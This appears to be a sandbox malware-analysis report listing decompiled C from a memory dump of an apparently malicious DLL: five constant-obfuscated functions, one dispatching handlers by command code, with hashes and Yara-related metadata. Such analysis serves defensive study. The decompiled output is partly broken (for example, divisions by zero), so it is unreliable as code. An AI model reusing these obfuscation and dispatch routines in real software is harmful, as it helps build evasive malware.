Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba3467f06acdf9d06503376040d4ce359b65c62597fe6af5f322f40bb5cf6547
Instruction ID: 0bcc6dfedd7bf1954e448288e5afe3760a4aacd80e037ff8914b4ca55db137a0
Opcode Fuzzy Hash: ba3467f06acdf9d06503376040d4ce359b65c62597fe6af5f322f40bb5cf6547
Instruction Fuzzy Hash: 55A1FFB5D01219EBEF58CFA5D9898DEFBB1FF44314F208159E411BA2A0E7B81A468F44

Uniqueness

Uniqueness Score: -1.00%

Function 10006417 Relevance: .2, Instructions: 181
COMMONCrypto

Download Yara Rule

C-Code - Quality: 22%

			E10006417(void* __edx, void* __eflags) {
				void* _t197;
				void* _t214;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				intOrPtr _t234;
				intOrPtr _t237;
				void* _t240;
				void* _t241;

				_t240 = _t241 - 0x58;
				_push( *((intOrPtr*)(_t240 + 0x7c)));
				_t234 =  *((intOrPtr*)(_t240 + 0x60));
				_push( *((intOrPtr*)(_t240 + 0x78)));
				_push( *((intOrPtr*)(_t240 + 0x74)));
				_push( *((intOrPtr*)(_t240 + 0x70)));
				_push( *((intOrPtr*)(_t240 + 0x6c)));
				_push( *((intOrPtr*)(_t240 + 0x68)));
				_push( *((intOrPtr*)(_t240 + 0x64)));
				_push(_t234);
				_push(__edx);
				_push(0);
				E10012550(_t197);
				 *(_t240 + 0x2c) = 0x767b;
				_t218 = 0x49;
				 *(_t240 + 0x2c) =  *(_t240 + 0x2c) * 0x7f;
				 *(_t240 + 0x2c) =  *(_t240 + 0x2c) / _t218;
				 *(_t240 + 0x2c) =  *(_t240 + 0x2c) ^ 0x0000f87c;
				 *(_t240 + 0x4c) = 0xef21;
				_t219 = 0x58;
				 *(_t240 + 0x4c) =  *(_t240 + 0x4c) * 0x51;
				 *(_t240 + 0x4c) =  *(_t240 + 0x4c) << 7;
				 *(_t240 + 0x4c) =  *(_t240 + 0x4c) ^ 0xa17ee643;
				 *(_t240 + 0x4c) =  *(_t240 + 0x4c) ^ 0x84aa5f32;
				 *(_t240 + 0x34) = 0x6d8e;
				 *(_t240 + 0x34) =  *(_t240 + 0x34) | 0x6849a982;
				 *(_t240 + 0x34) =  *(_t240 + 0x34) + 0xc220;
				 *(_t240 + 0x34) =  *(_t240 + 0x34) + 0xffff3440;
				 *(_t240 + 0x34) =  *(_t240 + 0x34) ^ 0x6849f13e;
				 *(_t240 + 0x1c) = 0xa45f;
				 *(_t240 + 0x1c) =  *(_t240 + 0x1c) ^ 0x8ac4df42;
				 *(_t240 + 0x1c) =  *(_t240 + 0x1c) ^ 0x8ac417ac;
				 *(_t240 + 0x48) = 0x404a;
				 *(_t240 + 0x48) =  *(_t240 + 0x48) >> 0xa;
				 *(_t240 + 0x48) =  *(_t240 + 0x48) / _t219;
				 *(_t240 + 0x48) =  *(_t240 + 0x48) + 0xffff6f8b;
				 *(_t240 + 0x48) =  *(_t240 + 0x48) ^ 0xffff405a;
				 *(_t240 + 0x50) = 0x54f1;
				 *(_t240 + 0x50) =  *(_t240 + 0x50) << 0xb;
				 *(_t240 + 0x50) =  *(_t240 + 0x50) + 0x3a90;
				 *(_t240 + 0x50) =  *(_t240 + 0x50) << 9;
				 *(_t240 + 0x50) =  *(_t240 + 0x50) ^ 0x4f85421e;
				 *(_t240 + 0x54) = 0x8597;
				 *(_t240 + 0x54) =  *(_t240 + 0x54) << 8;
				 *(_t240 + 0x54) =  *(_t240 + 0x54) | 0xa9f146ed;
				 *(_t240 + 0x54) =  *(_t240 + 0x54) >> 5;
				 *(_t240 + 0x54) =  *(_t240 + 0x54) ^ 0x054fb0bb;
				 *(_t240 + 0x44) = 0x73dc;
				 *(_t240 + 0x44) =  *(_t240 + 0x44) * 0x3b;
				 *(_t240 + 0x44) =  *(_t240 + 0x44) + 0xa50b;
				 *(_t240 + 0x44) =  *(_t240 + 0x44) ^ 0x812a8e6b;
				 *(_t240 + 0x44) =  *(_t240 + 0x44) ^ 0x8131b455;
				 *(_t240 + 0x14) = 0x8d69;
				 *(_t240 + 0x14) =  *(_t240 + 0x14) << 1;
				 *(_t240 + 0x14) =  *(_t240 + 0x14) ^ 0x00015647;
				 *(_t240 + 8) = 0x519d;
				 *(_t240 + 8) =  *(_t240 + 8) ^ 0xf9151e6a;
				 *(_t240 + 8) =  *(_t240 + 8) ^ 0xf9150c68;
				 *(_t240 + 0x3c) = 0xc74b;
				 *(_t240 + 0x3c) =  *(_t240 + 0x3c) | 0x7e9d0cc5;
				 *(_t240 + 0x3c) =  *(_t240 + 0x3c) + 0xffff6740;
				 *(_t240 + 0x3c) =  *(_t240 + 0x3c) + 0x85e7;
				 *(_t240 + 0x3c) =  *(_t240 + 0x3c) ^ 0x7e9dd5d0;
				 *(_t240 + 0x24) = 0x7835;
				 *(_t240 + 0x24) =  *(_t240 + 0x24) + 0x26c5;
				 *(_t240 + 0x24) =  *(_t240 + 0x24) >> 0x10;
				 *(_t240 + 0x24) =  *(_t240 + 0x24) ^ 0x00005957;
				 *(_t240 + 0x30) = 0xbe83;
				 *(_t240 + 0x30) =  *(_t240 + 0x30) | 0xb98edffe;
				 *(_t240 + 0x30) =  *(_t240 + 0x30) << 8;
				 *(_t240 + 0x30) =  *(_t240 + 0x30) + 0xffff95b5;
				 *(_t240 + 0x30) =  *(_t240 + 0x30) ^ 0x8efff2e6;
				 *(_t240 + 0x38) = 0x2bdc;
				 *(_t240 + 0x38) =  *(_t240 + 0x38) + 0xdf33;
				_t237 = 0x44;
				 *(_t240 + 0x38) =  *(_t240 + 0x38) * 0x50;
				 *(_t240 + 0x38) =  *(_t240 + 0x38) << 7;
				 *(_t240 + 0x38) =  *(_t240 + 0x38) ^ 0x29ba000b;
				 *(_t240 + 0xc) = 0x57cb;
				 *(_t240 + 0xc) =  *(_t240 + 0xc) + 0x1cd9;
				 *(_t240 + 0xc) =  *(_t240 + 0xc) ^ 0x00006426;
				 *(_t240 + 0x40) = 0x6f55;
				 *(_t240 + 0x40) =  *(_t240 + 0x40) | 0x563c3ba0;
				 *(_t240 + 0x40) =  *(_t240 + 0x40) << 0xd;
				 *(_t240 + 0x40) =  *(_t240 + 0x40) + 0xfffff8ef;
				 *(_t240 + 0x40) =  *(_t240 + 0x40) ^ 0x8ffe8da5;
				 *(_t240 + 0x20) = 0x40d0;
				 *(_t240 + 0x20) =  *(_t240 + 0x20) * 0x75;
				 *(_t240 + 0x20) =  *(_t240 + 0x20) ^ 0x609dd8a9;
				 *(_t240 + 0x20) =  *(_t240 + 0x20) ^ 0x608076c4;
				 *(_t240 + 0x28) = 0x4853;
				 *(_t240 + 0x28) =  *(_t240 + 0x28) ^ 0x8def0e3c;
				 *(_t240 + 0x28) =  *(_t240 + 0x28) << 2;
				 *(_t240 + 0x28) =  *(_t240 + 0x28) ^ 0x37bd1438;
				 *(_t240 + 0x10) = 0x42ee;
				 *(_t240 + 0x10) =  *(_t240 + 0x10) * 0x60;
				 *(_t240 + 0x10) =  *(_t240 + 0x10) ^ 0x00197620;
				 *(_t240 + 0x18) = 0x469;
				 *(_t240 + 0x18) =  *(_t240 + 0x18) * 0x15;
				 *(_t240 + 0x18) =  *(_t240 + 0x18) ^ 0x00003a34;
				_t220 =  *(_t240 + 0x2c);
				E10005755(_t220, _t240 - 0x4c,  *(_t240 + 0x4c),  *(_t240 + 0x34), _t237);
				 *((intOrPtr*)(_t240 - 0x4c)) = _t237;
				_push( *(_t240 + 0x24));
				_push(_t220);
				_push(_t240 - 0x4c);
				_push( *(_t240 + 0x3c));
				_push( *((intOrPtr*)(_t240 + 0x64)));
				_push( *(_t240 + 8));
				_push( *(_t240 + 0x14));
				_push(_t240 - 8);
				_push( *((intOrPtr*)(_t240 + 0x78)));
				_push(_t220);
				_push( *(_t240 + 0x44));
				_push( *(_t240 + 0x54));
				_push( *(_t240 + 0x50));
				_push( *(_t240 + 0x48));
				if(E1001B86E( *((intOrPtr*)(_t240 + 0x7c)),  *(_t240 + 0x1c)) == 0) {
					_t214 = 0;
				} else {
					if(_t234 == 0) {
						E1000F1ED( *(_t240 + 0x30),  *(_t240 + 0x38),  *(_t240 + 0xc),  *(_t240 + 0x40),  *((intOrPtr*)(_t240 - 8)));
						E1000F1ED( *(_t240 + 0x20),  *(_t240 + 0x28),  *(_t240 + 0x10),  *(_t240 + 0x18),  *((intOrPtr*)(_t240 - 4)));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t214 = 1;
				}
				return _t214;
			}

0x10006418
0x10006424
0x10006427
0x1000642a
0x1000642d
0x10006430
0x10006433
0x10006436
0x10006439
0x1000643c
0x1000643d
0x1000643e
0x10006440
0x10006445
0x10006454
0x10006457
0x10006461
0x10006464
0x1000646b
0x10006476
0x10006477
0x1000647a
0x1000647e
0x10006485
0x1000648c
0x10006493
0x1000649a
0x100064a1
0x100064a8
0x100064af
0x100064b6
0x100064bd
0x100064c4
0x100064cb
0x100064d4
0x100064d7
0x100064de
0x100064e5
0x100064ec
0x100064f0
0x100064f7
0x100064fb
0x10006502
0x10006509
0x1000650d
0x10006514
0x10006518
0x1000651f
0x1000652a
0x1000652d
0x10006534
0x1000653b
0x10006542
0x10006549
0x1000654c
0x10006553
0x1000655a
0x10006561
0x10006568
0x1000656f
0x10006576
0x1000657d
0x10006584
0x1000658b
0x10006592
0x10006599
0x1000659d
0x100065a4
0x100065ab
0x100065b2
0x100065b9
0x100065c0
0x100065c7
0x100065ce
0x100065db
0x100065dd
0x100065e0
0x100065e4
0x100065eb
0x100065f2
0x100065f9
0x10006600
0x10006607
0x1000660e
0x10006612
0x10006619
0x10006620
0x1000662b
0x1000662e
0x10006635
0x1000663c
0x10006643
0x1000664a
0x1000664e
0x10006655
0x10006660
0x10006663
0x1000666a
0x10006675
0x10006678
0x10006685
0x10006688
0x10006690
0x10006696
0x10006699
0x1000669a
0x1000669b
0x100066a1
0x100066a4
0x100066a7
0x100066aa
0x100066ae
0x100066b1
0x100066b2
0x100066b8
0x100066bb
0x100066be
0x100066ce
0x1000670d
0x100066d0
0x100066d2
0x100066ef
0x10006703
0x100066d4
0x100066d7
0x100066d8
0x100066d9
0x100066da
0x100066da
0x100066dd
0x100066dd
0x10006715

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bb1d0a9ce0f6d895f827a8d88b19ef494e72e3d5b923de3fddf5965c7bef492
Instruction ID: 7634e4d81eb30711fccde11c5c5232352939f963d98bf4875d12e119962ff113
Opcode Fuzzy Hash: 1bb1d0a9ce0f6d895f827a8d88b19ef494e72e3d5b923de3fddf5965c7bef492
Instruction Fuzzy Hash: 6D91F271400648EBDF59CF64C94A8CE3FA1FF44398F509218FE2A961A4D3B6D999CF84

Uniqueness

Uniqueness Score: -1.00%

Function 10012FA1 Relevance: .1, Instructions: 138
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10012FA1(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v56;
				intOrPtr _v60;
				void* _v64;
				char _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v152;
				void* _t110;
				void* _t117;
				intOrPtr _t123;
				intOrPtr _t125;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t131;
				intOrPtr _t160;
				void* _t161;
				void* _t163;
				void* _t164;

				_t164 = __eflags;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t110);
				_v88 = 0x5fdafb;
				_t150 =  &_v152;
				_v84 = 0x272783;
				_t160 = 0;
				_v80 = 0xd89dc;
				_v76 = 0;
				_v48 = 0x58f7;
				_v48 = _v48 + 0xcffd;
				_v48 = _v48 ^ 0x00015f94;
				_v12 = 0xd46e;
				_v12 = _v12 | 0xfa6bedce;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x0fa6c3f2;
				_v16 = 0x3620;
				_v16 = _v16 | 0xaf83d9cf;
				_v16 = _v16 ^ 0x6ff25359;
				_v16 = _v16 >> 3;
				_v16 = _v16 ^ 0x180e6d86;
				_v44 = 0x33ae;
				_v44 = _v44 + 0xffff05b5;
				_v44 = _v44 ^ 0xffff5bf3;
				_v24 = 0x830a;
				_v24 = _v24 | 0xa02b6576;
				_v24 = _v24 + 0xffff5bd8;
				_v24 = _v24 ^ 0xa02b6dd8;
				_v28 = 0xcb19;
				_v28 = _v28 << 7;
				_v28 = _v28 << 1;
				_v28 = _v28 ^ 0x00cb50e4;
				_v36 = 0x6363;
				_v36 = _v36 | 0xa74857af;
				_v36 = _v36 ^ 0x416ac2c3;
				_v36 = _v36 ^ 0xe622f2da;
				_v32 = 0xc5a6;
				_v32 = _v32 ^ 0x561a69db;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x0d563ace;
				_v40 = 0x6155;
				_v40 = _v40 >> 0xb;
				_v40 = _v40 * 0x3b;
				_v40 = _v40 ^ 0x00001994;
				_v20 = 0xb711;
				_v20 = _v20 >> 7;
				_v20 = _v20 * 0x78;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x00000d9d;
				E1000FEE3(_a4,  &_v152, _v48, _v12, _v16, _v44);
				_t117 = E1000F914(_v24, _v28, _t164, _v36,  &_v72, _v32, _t150);
				_t163 = _t161 + 0x2c;
				while(_t117 != 0) {
					__eflags = E1000BE74(_v40,  &_v64, _v20,  &_v72);
					if(__eflags != 0) {
						_t123 = _v60 - 1;
						__eflags = _t123;
						if(_t123 == 0) {
							E10013F4F(_v64,  &_v56);
						} else {
							_t125 = _t123 - 1;
							__eflags = _t125;
							if(_t125 == 0) {
								E1000240F(_v64,  &_v56);
							} else {
								_t127 = _t125 - 1;
								__eflags = _t127;
								if(_t127 == 0) {
									E1001D70B(_v64,  &_v56);
								} else {
									_t129 = _t127 - 1;
									__eflags = _t129;
									if(_t129 == 0) {
										E1000ADAF(_v64,  &_v56);
									} else {
										_t131 = _t129 - 6;
										__eflags = _t131;
										if(_t131 == 0) {
											E1001BBF1(_v64,  &_v56);
										} else {
											__eflags = _t131 == 1;
											if(_t131 == 1) {
												E10016BE4(_v64,  &_v56);
											}
										}
									}
								}
							}
						}
						_t160 = _t160 + 1;
						__eflags = _t160;
					}
					_t117 = E1000F914(_v24, _v28, __eflags, _v36,  &_v72, _v32,  &_v152);
					_t163 = _t163 + 0x10;
				}
				return _t160;
			}

0x10012fa1
0x10012fab
0x10012fae
0x10012faf
0x10012fb0
0x10012fb5
0x10012fbc
0x10012fc2
0x10012fc9
0x10012fcb
0x10012fd5
0x10012fd8
0x10012fdf
0x10012fe6
0x10012fed
0x10012ff4
0x10012ffb
0x10012fff
0x10013006
0x1001300d
0x10013014
0x1001301b
0x1001301f
0x10013026
0x1001302d
0x10013034
0x1001303b
0x10013042
0x10013049
0x10013050
0x10013057
0x1001305e
0x10013062
0x10013065
0x1001306c
0x10013073
0x1001307a
0x10013081
0x10013088
0x1001308f
0x10013096
0x1001309a
0x100130a1
0x100130a8
0x100130b3
0x100130b6
0x100130bd
0x100130c4
0x100130cc
0x100130cf
0x100130d3
0x100130e6
0x100130fe
0x10013103
0x100131a6
0x1001311f
0x10013121
0x10013126
0x10013126
0x10013127
0x10013181
0x10013129
0x10013129
0x10013129
0x1001312a
0x10013174
0x1001312c
0x1001312c
0x1001312c
0x1001312d
0x10013167
0x1001312f
0x1001312f
0x1001312f
0x10013130
0x1001315a
0x10013132
0x10013132
0x10013132
0x10013135
0x1001314d
0x10013137
0x10013137
0x10013138
0x10013140
0x10013140
0x10013138
0x10013135
0x10013130
0x1001312d
0x1001312a
0x10013186
0x10013186
0x10013186
0x1001319e
0x100131a3
0x100131a3
0x100131b4

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 798dcc80f28f754ef4a8133266f197d27c7fe18b7239adb6d2b86fb99832f5cb
Instruction ID: f323d6bf17ce31e22add3c4c0add9cdd8bc95a2a925c9286cdb889dea506a1d7
Opcode Fuzzy Hash: 798dcc80f28f754ef4a8133266f197d27c7fe18b7239adb6d2b86fb99832f5cb
Instruction Fuzzy Hash: 55513571C0421EABDF08CFE4DA468EEBBB5FF44344F208558E511BA264D7B5AA45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000A525 Relevance: .1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E1000A525(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _t124;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t132;
				void* _t148;

				_push(_a12);
				_push(_a8);
				_v48 = 0x104;
				_push(_a4);
				_push(__edx);
				_push(0x104);
				E10012550(0x104);
				_v8 = 0x5228;
				_t148 = 0;
				_t129 = 0x75;
				_v8 = _v8 / _t129;
				_t130 = 0x18;
				_v8 = _v8 / _t130;
				_v8 = _v8 + 0x75ec;
				_v8 = _v8 ^ 0x00006735;
				_v24 = 0x3444;
				_v24 = _v24 | 0x67f8f53e;
				_v24 = _v24 >> 0xf;
				_v24 = _v24 ^ 0x00009a34;
				_v16 = 0xef12;
				_v16 = _v16 >> 7;
				_t131 = 0x4c;
				_v16 = _v16 * 0x61;
				_v16 = _v16 + 0x9bb9;
				_v16 = _v16 ^ 0x00012294;
				_v44 = 0xb0ea;
				_v44 = _v44 + 0xffff7f2b;
				_v44 = _v44 ^ 0x00003439;
				_v28 = 0xbc68;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x0b04eabb;
				_v28 = _v28 ^ 0x0b06595b;
				_v40 = 0x8c64;
				_v40 = _v40 * 5;
				_v40 = _v40 + 0x4c62;
				_v40 = _v40 ^ 0x00036b68;
				_v36 = 0xe385;
				_v36 = _v36 << 7;
				_t132 = 5;
				_v36 = _v36 / _t131;
				_v36 = _v36 ^ 0x000154a9;
				_v20 = 0xd5bf;
				_v20 = _v20 + 0x3bce;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 | 0xfc33a738;
				_v20 = _v20 ^ 0xfc33f58d;
				_v32 = 0xac74;
				_v32 = _v32 << 0xf;
				_v32 = _v32 / _t132;
				_v32 = _v32 ^ 0x113ecb06;
				_v12 = 0x99c5;
				_v12 = _v12 << 0xa;
				_v12 = _v12 >> 7;
				_v12 = _v12 | 0x7a8586f5;
				_v12 = _v12 ^ 0x7a85defd;
				_t124 = E10013358(_t132, _v12, _t132, _t132, _a8);
				_t147 = _t124;
				if(_t124 != 0) {
					_push(_t132);
					_t148 = E10011B9D(_v16, _v44, _a4, _v28, _t147,  &_v48);
					E1000F1ED(_v40, _v36, _v20, _v32, _t147);
				}
				return _t148;
			}

0x1000a52d
0x1000a535
0x1000a538
0x1000a53b
0x1000a53e
0x1000a53f
0x1000a540
0x1000a545
0x1000a554
0x1000a558
0x1000a55d
0x1000a565
0x1000a56a
0x1000a56f
0x1000a576
0x1000a57d
0x1000a584
0x1000a58b
0x1000a58f
0x1000a596
0x1000a59d
0x1000a5a5
0x1000a5a8
0x1000a5ab
0x1000a5b2
0x1000a5b9
0x1000a5c0
0x1000a5c7
0x1000a5ce
0x1000a5d5
0x1000a5d9
0x1000a5e0
0x1000a5e7
0x1000a5f2
0x1000a5f5
0x1000a5fc
0x1000a603
0x1000a60a
0x1000a613
0x1000a614
0x1000a619
0x1000a620
0x1000a627
0x1000a62e
0x1000a632
0x1000a639
0x1000a640
0x1000a647
0x1000a653
0x1000a656
0x1000a65d
0x1000a664
0x1000a668
0x1000a66c
0x1000a673
0x1000a685
0x1000a68a
0x1000a691
0x1000a693
0x1000a6ae
0x1000a6b9
0x1000a6be
0x1000a6c8

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bbadcc866d8b4040baa0a8c8f4469103875442558c010708b315e9b0989b624
Instruction ID: d5b3ef2e698c15f9dc8ebc886caf84f8b0c443f4bb10c19fbd73e56a7348d34b
Opcode Fuzzy Hash: 2bbadcc866d8b4040baa0a8c8f4469103875442558c010708b315e9b0989b624
Instruction Fuzzy Hash: 0E511775D0020DEBEF08CFE5C84A8DEBBB5EB48314F208159E410B6250D7B95B55CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1000A6C9 Relevance: .1, Instructions: 90
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1000A6C9(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				char _v560;
				intOrPtr* _t92;

				_v40 = 0;
				_v8 = 0xf494;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 4;
				_v8 = _v8 | 0xf278016b;
				_v8 = _v8 ^ 0xf2787422;
				_v24 = 0xcf3b;
				_v24 = _v24 + 0xffff718a;
				_push(0x48);
				_pop(0);
				_v24 = _v24 / 0;
				_v24 = _v24 ^ 0x00007af7;
				_v32 = 0xe834;
				_v32 = _v32 + 0x185d;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x000037bf;
				_v20 = 0xef96;
				_v20 = _v20 + 0xffffdb9a;
				_v20 = _v20 * 0x73;
				_v20 = _v20 ^ 0x005b1c49;
				_v36 = 0x968d;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x000009ee;
				_v28 = 0x17aa;
				_v28 = _v28 / 0;
				_v28 = _v28 * 0x3a;
				_v28 = _v28 ^ 0x00000fdd;
				_v12 = 0xb689;
				_v12 = _v12 * 0x6c;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x00007e37;
				_v16 = 0xc92d;
				_v16 = _v16 >> 5;
				_v16 = _v16 | 0xe8c7394a;
				_v16 = _v16 ^ 0xe8c76f48;
				if(E1000C931( &_v560, _v8, _v24, _v32) != 0) {
					_t92 =  &_v560;
					if(_v560 != 0) {
						while( *_t92 != 0x5c) {
							_t92 = _t92 + 2;
							if( *_t92 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						 *((short*)(_t92 + 2)) = 0;
					}
					L6:
					E1001E0AF(0, _v20, 0, _v36, 0,  &_v40, _v28, 0,  &_v560, 0, _v12, 0, _v16);
				}
				return _v40;
			}

0x1000a6d7
0x1000a6da
0x1000a6e1
0x1000a6e5
0x1000a6e9
0x1000a6f0
0x1000a6f7
0x1000a6fe
0x1000a708
0x1000a70a
0x1000a70f
0x1000a712
0x1000a719
0x1000a720
0x1000a727
0x1000a72b
0x1000a732
0x1000a739
0x1000a744
0x1000a747
0x1000a74e
0x1000a755
0x1000a759
0x1000a760
0x1000a772
0x1000a779
0x1000a77c
0x1000a783
0x1000a78e
0x1000a791
0x1000a795
0x1000a798
0x1000a79f
0x1000a7a6
0x1000a7aa
0x1000a7b1
0x1000a7cb
0x1000a7cd
0x1000a7da
0x1000a7dc
0x1000a7e2
0x1000a7e8
0x00000000
0x00000000
0x1000a7ea
0x00000000
0x1000a7e8
0x1000a7ee
0x1000a7ee
0x1000a7f2
0x1000a811
0x1000a816
0x1000a820

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0ed3f14480d6fb85cf8ede8ed01864779f7b807295fd40e7721b35f462d89f7
Instruction ID: a2ceff6652514a548af2e11d1daca55997f1601b49ce4d810e2f5ded8b209dac
Opcode Fuzzy Hash: d0ed3f14480d6fb85cf8ede8ed01864779f7b807295fd40e7721b35f462d89f7
Instruction Fuzzy Hash: E241F472C0021EABEF19CFE1C94A9EEBBB5FB04304F208199D014B6194D3B95B99CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1001D4E1 Relevance: .1, Instructions: 87
COMMONCrypto

Download Yara Rule

C-Code - Quality: 28%

			E1001D4E1(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				signed int _t103;
				signed int _t107;
				signed int _t108;
				signed int _t109;
				void* _t117;
				void* _t118;
				signed int _t119;
				void* _t122;

				_t122 = __eflags;
				_v8 = 0x9d48;
				_v8 = _v8 << 0xa;
				_t118 = __ecx;
				_t107 = 0xc;
				_v8 = _v8 / _t107;
				_v8 = _v8 ^ 0x84a8c1f7;
				_v8 = _v8 ^ 0x849ce678;
				_v16 = 0x4884;
				_v16 = _v16 + 0xfffff3b9;
				_v16 = _v16 ^ 0x6bddc2ef;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x0000e0dc;
				_v12 = 0x1ff1;
				_t108 = 0x5e;
				_v12 = _v12 * 0x6e;
				_v12 = _v12 << 0xe;
				_v12 = _v12 * 0xd;
				_v12 = _v12 ^ 0x9b0dd4a2;
				_v28 = 0x87c6;
				_v28 = _v28 + 0xffff61ee;
				_v28 = _v28 / _t108;
				_v28 = _v28 ^ 0x02b97512;
				_v24 = 0x2da2;
				_v24 = _v24 + 0xffff2827;
				_v24 = _v24 + 0xffff9d22;
				_v24 = _v24 ^ 0xfffeb986;
				_v20 = 0x7758;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 | 0x0ba9e341;
				_v20 = _v20 ^ 0x0ba99bf4;
				_v36 = 0x8619;
				_v36 = _v36 ^ 0x2bac5130;
				_v36 = _v36 ^ 0x2bac97af;
				_v40 = E1000A156();
				_v32 = 0x8f7a;
				_t109 = 0x71;
				_v32 = _v32 / _t109;
				_v32 = _v32 ^ 0x00000141;
				_v8 = 0xc831;
				_v8 = _v8 + 0xffffeaea;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x00002cd6;
				_t103 = E1000DF8A(_t109, _v32 % _t109, _t122, _v8, _v32);
				_push(_v36);
				_t119 = _t103;
				_push(_v20);
				_push(_v24);
				_push(_t118);
				_push(_t119);
				_push(_v28);
				_t117 = 3;
				E10019A27( &_v40, _t117);
				 *((short*)(_t118 + _t119 * 2)) = 0;
				return 0;
			}

0x1001d4e1
0x1001d4e7
0x1001d4f0
0x1001d4fb
0x1001d4fd
0x1001d502
0x1001d507
0x1001d50e
0x1001d515
0x1001d51c
0x1001d523
0x1001d52a
0x1001d52e
0x1001d535
0x1001d540
0x1001d541
0x1001d544
0x1001d54c
0x1001d54f
0x1001d556
0x1001d55d
0x1001d569
0x1001d56c
0x1001d573
0x1001d57a
0x1001d581
0x1001d588
0x1001d58f
0x1001d596
0x1001d59a
0x1001d5a1
0x1001d5a8
0x1001d5af
0x1001d5b6
0x1001d5c5
0x1001d5ca
0x1001d5d6
0x1001d5d9
0x1001d5dc
0x1001d5e3
0x1001d5ea
0x1001d5f1
0x1001d5f5
0x1001d608
0x1001d60d
0x1001d610
0x1001d615
0x1001d618
0x1001d61b
0x1001d61c
0x1001d61d
0x1001d622
0x1001d623
0x1001d62d
0x1001d636

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
